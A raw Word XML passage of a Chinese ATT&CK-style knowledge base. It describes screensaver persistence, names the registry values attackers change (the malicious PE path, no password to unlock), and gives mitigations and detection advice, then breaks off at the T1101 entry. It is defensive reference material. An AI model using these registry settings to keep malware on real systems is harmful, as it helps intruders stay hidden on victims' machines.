          <w:p w14:paraId="6404953F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>用户</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDE79BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进程</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>监控，进程命令行参数，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>注册表，文件监控</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="57F1180F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Bartosz Jerzman</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5734CD77" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6CFF698D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D8127B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕保护程序在用户不活动一定时间之后执行，此段</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>时长可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>保护程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件是</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>（可移植可执行）</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扩展名为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.scr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕保护程序</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>scrnsave.scr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它基础安装中的屏幕保护程序一起放置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t xml:space="preserve"> 32</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>操作系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\System32\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，或</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>64</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>位</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>操作系统中</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>C:\Windows\sysWOW64\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDD0A5D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下屏幕保护程序设置存储在注册表（</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>HKCU\Control Panel\Desktop\</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）中。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>攻击者可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操控它们来实现持久性：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E39A29" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00683C05" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>SCRNSAVE.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00683C05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为恶意</w:t>
      </w:r>
      <w:r w:rsidRPr="00683C05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00683C05">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369DBA7D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ScreenSaveActive</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，启用屏幕保护程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C080B9A" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ScreenSaverIsSecure</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:cs="Helvetica"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，不需要密码即可解锁</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB1EF1C" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>ScreenSaverTimeout</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户的不活动时长，超过这个时长</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>即</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>启动屏幕保护程序</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342EC8AF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>设置</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>屏幕保护程序在用户不活动一定时间后运行恶意软件来维持持久性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D5AE4E" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3393"/>
        <w:gridCol w:w="6343"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00683C05" w14:paraId="08F7F845" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="7D8C99CF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00683C05" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00683C05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="15F5923D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00683C05" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00683C05">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="2CAB9905" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BFC14D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId72" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>特性</w:t>
              </w:r>
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>/</w:t>
              </w:r>
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>程序</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>禁用或移除</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="00B7F7D7" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果不需要屏幕保护程序，请使用组策略来</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>它。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="453F6BEC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3393" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4E1A2B36" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="00CC5590" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:hyperlink r:id="rId73" w:history="1">
              <w:r w:rsidR="000F2665" w:rsidRPr="00671A0D">
                <w:rPr>
                  <w:rStyle w:val="af4"/>
                  <w:rFonts w:hint="eastAsia"/>
                  <w:color w:val="auto"/>
                </w:rPr>
                <w:t>执行预防</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6343" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF88627" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>阻止</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>.scr</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件从非标准位置执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2D1C09D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27B22D10" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:lastRenderedPageBreak/>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79777BE0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监控</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.scr</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的进程执行和命令行参数。监控注册表中与典型用户行为无关的屏幕保护程序配置更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D841FF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sysinternals Autoruns</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等工具来检测注册表中屏幕保护程序二进制路径的更改。可疑路径和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PE</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件可能指示网络中合法屏保存在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>异常情况</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，应进行调查。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E68DD21" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>安全支持提供</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>者</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="031569AA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57F820D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1101</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="650FC5FE" w14:textId="3C43B211" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidR="00680B04">
              <w:t>持久化</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="292B99D6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08B96430" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>所需权限：管理员</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4536D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>动态链接库</w:t>
